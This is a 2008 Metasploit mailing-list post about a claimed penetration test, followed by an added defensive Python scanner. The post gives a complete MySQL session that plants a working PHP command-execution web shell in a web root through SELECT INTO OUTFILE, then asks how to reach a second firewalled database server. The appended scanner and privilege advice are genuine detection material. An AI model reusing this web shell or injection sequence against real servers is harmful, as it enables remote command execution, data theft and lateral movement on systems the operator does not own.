Metasploit mailing list archives
SOME PENTISTING ROCK I HIT
From: chuksjonia at gmail.com (chuks Jonia)
Date: Mon, 28 Jul 2008 17:42:50 +0000
Thanks Daniel for the reply.

For the webserver, let's say the IP is 192.168.0.1; it has ports 3306 and 80 open. I was able to compromise this very fast, because the pages used at the Care Center server were almost the same, so I could read the config PHP files.

For the next server, let's say 192.168.0.2 (though in the real world it's a public IP, but protected from the public by a NetScreen), it has a webserver running on 443 and 80, and connects to some financial companies, but its DB is running on another box, 192.168.0.3 (a public IP too, but protected by the NetScreen too). This DB server has port 3306 open but no webserver running; all the SQL scripts are executing on the second private server.

Okay, for the first webserver, due to ports 3306 and 80 being open, it was easy to do this:

mysql> CREATE TABLE chuks (codetab text);
ERROR 1046 (3D000): No database selected
mysql> use test
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> CREATE TABLE chuks (codetab text);
ERROR 1050 (42S01): Table 'chuks' already exists
mysql> DROP TABLE chuks;
Query OK, 0 rows affected (0.04 sec)
mysql> CREATE TABLE chuks (codetab text);
Query OK, 0 rows affected (0.05 sec)
mysql> INSERT INTO chuks (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>Exec Shell code :: by chuks</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
Query OK, 1 row affected (0.06 sec)
mysql> SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks;
Query OK, 1 row affected (0.04 sec)

The question is: is there any way I can write to another server if I select into outfile on that path, and how can I do it?

/Chuks
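A defender-side view of the technique in the message above, as an added example that is not part of the original post: a Python scan of MySQL query-log text for SELECT ... INTO OUTFILE/DUMPFILE exports that land in a web-served directory or carry a script extension. The web roots, the extension list and all log lines except the statement quoted from the message are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumptions for this example: directories served by the web server and
# extensions it would execute. Adjust both to the host being monitored.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx/html")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".jsp", ".cgi", ".pl")

# Matches: INTO OUTFILE '<path>' and INTO DUMPFILE '<path>'
EXPORT_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2",
                       re.IGNORECASE)

def classify(path):
    """Rate a server-side export target as high, medium or low."""
    # normpath collapses ../ so a traversal cannot hide the real target
    norm = posixpath.normpath(path)
    in_web_root = any(norm == r or norm.startswith(r + "/") for r in WEB_ROOTS)
    is_script = norm.lower().endswith(SCRIPT_EXTS)
    if in_web_root and is_script:
        return "high"      # executable file dropped where the web server runs it
    if in_web_root or is_script:
        return "medium"    # data exposed over HTTP, or a script staged elsewhere
    return "low"           # ordinary export, still worth an inventory

def scan(lines):
    """Return (line number, keyword, path as logged, rating) per export found."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in EXPORT_RE.finditer(line):
            path = m.group(3)
            findings.append((lineno, m.group(1).upper(), path, classify(path)))
    return findings

# Constructed log lines; the first statement is the one quoted in the message.
SAMPLE_LOG = [
    "12 Query SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks",
    "13 Query SELECT id, total FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "14 Query select codetab into dumpfile '/tmp/../var/www/html/x.phtml' from t",
    "15 Query SELECT name FROM users WHERE id = 7",
    "16 Query SELECT * FROM report INTO OUTFILE '/var/www/html/export.csv'",
]

if __name__ == "__main__":
    for lineno, keyword, path, rating in scan(SAMPLE_LOG):
        print(f"line {lineno}: {keyword} -> {path} [{rating}]")
```

INTO OUTFILE requires the FILE privilege and is restricted by the secure_file_priv system variable, so auditing both belongs alongside a log scan like this one.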
Current thread:
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- Message not available
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- SOME PENTISTING ROCK I HIT H D Moore (Jul 28)
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- Message not available